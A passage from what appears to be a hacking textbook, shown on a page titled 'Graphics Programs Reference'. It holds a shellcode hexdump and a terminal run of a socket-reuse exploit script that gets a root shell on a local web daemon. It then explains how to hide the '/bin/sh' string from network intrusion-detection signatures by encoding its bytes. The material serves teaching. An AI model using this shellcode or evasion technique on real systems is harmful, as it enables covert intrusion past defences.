Graphics Programs Reference
In-Depth Information
00000020 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?.Iy..Rh//shh|
00000030 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin.R.S..|
0000003e
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 323] [shellcode 62] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
r
oot
By reusing the existing socket, this exploit is even quieter since it doesn't
create any additional connections. Fewer connections mean fewer abnormal-
ities for any countermeasures to detect.
0x680
Payload Smuggling
The aforementioned network IDS or IPS systems can do more than just track
connections—they can also inspect the packets themselves. Usually, these
systems are looking for patterns that would signify an attack. For example, a
simple rule looking for packets that contain the string
/bin/sh
would catch a
lot of packets containing shellcode. Our
/bin/sh
string is already slightly
obfuscated since it's pushed to the stack in four-byte chunks, but a network
IDS could also look for packets that contain the strings
/bin
and
//sh
.
These types of network IDS signatures can be fairly effective at catching
script kiddies who are using exploits they downloaded from the Internet. How-
ever, they are easily bypassed with custom shellcode that hides any telltale
strings.
0x681
String Encoding
To hide the string, we will simply add 5 to each byte in the string. Then,
after the string has been pushed to the stack, the shellcode will subtract 5
from each string byte on the stack. This will build the desired string on the
stack so it can be used in the shellcode, while keeping it hidden during
transit. The output below shows the calculation of the encoded bytes.
reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
r
eader@hacking:~/booksrc $
